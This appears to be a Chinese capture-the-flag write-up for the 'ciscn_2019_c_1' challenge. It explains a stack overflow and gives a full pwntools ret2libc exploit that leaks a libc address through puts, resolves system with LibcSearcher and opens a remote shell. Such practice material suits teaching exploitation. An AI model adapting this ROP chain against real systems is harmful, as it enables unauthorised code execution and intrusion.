先查看一下程序的基本信息和保护。
是一个 64 位的程序，开启了 NX（栈不可执行），所以不能直接在栈上执行 shellcode，需要用 ROP。
拿IDA分析
发现存在栈溢出漏洞（输入缓冲区大小为 0x50，再加 8 字节的 saved rbp 即可覆盖返回地址）。
程序本身没有 system 函数，也没有 /bin/sh 字符串，
因此考虑 ret2libc：先利用 puts 泄露 puts 的 GOT 表内容并返回 main，用 LibcSearcher 确定 libc 版本并算出基址，再第二次溢出调用 system("/bin/sh")。
exp:
from pwn import*
from LibcSearcher import*
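# Addresses hard-coded from the binary (no PIE, so they do not move):
#   MAIN_ADDR - return here after the leak so the buffer can be overflowed again
#   POP_RDI   - `pop rdi ; ret` gadget (first argument for puts/system)
#   RET       - lone `ret` gadget, used only for stack alignment in stage 2
MAIN_ADDR = 0x400B28
POP_RDI = 0x400C83
RET = 0x4006B9

# Stack layout from IDA: 0x50-byte input buffer + 8 bytes of saved rbp
# sit between the start of our input and the return address.
# NOTE(review): the program "encrypts" the plaintext in place (see the
# prompts below); this chain is sent without a leading NUL and still lands
# in the original writeup -- confirm against the binary which byte ranges
# the encrypt routine touches if the payload ever gets corrupted.
PADDING = b"A" * (0x50 + 8)

# Set context before opening the connection so the debug log covers it.
context(os="linux", arch="amd64", log_level="debug")
elf = ELF("./ciscn_2019_c_1")
p = remote("node4.buuoj.cn", 27495)
# p = process("./ciscn_2019_c_1")  # uncomment for a local run


def _goto_encrypt(io):
    """Select menu option 1 and wait for the plaintext prompt."""
    io.recvuntil(b"Input your choice!")
    io.sendline(b"1")
    io.recvuntil(b"Input your Plaintext to be encrypted")


def _leak_puts(io, binary):
    """Stage 1: overflow into puts(puts@got), return to main.

    Returns the runtime address of puts in the remote libc.
    """
    puts_plt = binary.plt["puts"]
    puts_got = binary.got["puts"]
    _goto_encrypt(io)
    chain = PADDING + p64(POP_RDI) + p64(puts_got) + p64(puts_plt) + p64(MAIN_ADDR)
    io.sendline(chain)
    # Skip the echoed ciphertext line; the line after it is puts' raw output.
    io.recvuntil(b"Ciphertext\n")
    io.recvline()
    # recvn(6) blocks until exactly the 6 significant address bytes arrive.
    # The original recv(7)[:-1] could chop a real byte whenever the socket
    # delivered fewer than 7 bytes in one read; the trailing newline is
    # consumed by the next recvuntil().
    return u64(io.recvn(6).ljust(8, b"\x00"))


if __name__ == "__main__":
    puts_addr = _leak_puts(p, elf)
    log.success("puts @ " + hex(puts_addr))

    # LibcSearcher matches the low 12 bits of the leak against its database
    # and may offer several candidate libc builds; the offsets below are
    # only valid for the one that actually runs on the target, so pick
    # carefully if it prompts.
    libc = LibcSearcher("puts", puts_addr)
    libc_base = puts_addr - libc.dump("puts")
    system_addr = libc_base + libc.dump("system")
    bin_sh_addr = libc_base + libc.dump("str_bin_sh")
    log.success("libc base @ " + hex(libc_base))

    # Stage 2: system("/bin/sh"). The extra RET keeps rsp 16-byte aligned
    # when system() is entered; without it newer glibc's system() can
    # fault on an aligned SSE (movaps) instruction.
    _goto_encrypt(p)
    p.sendline(PADDING + p64(RET) + p64(POP_RDI) + p64(bin_sh_addr) + p64(system_addr))
    p.interactive()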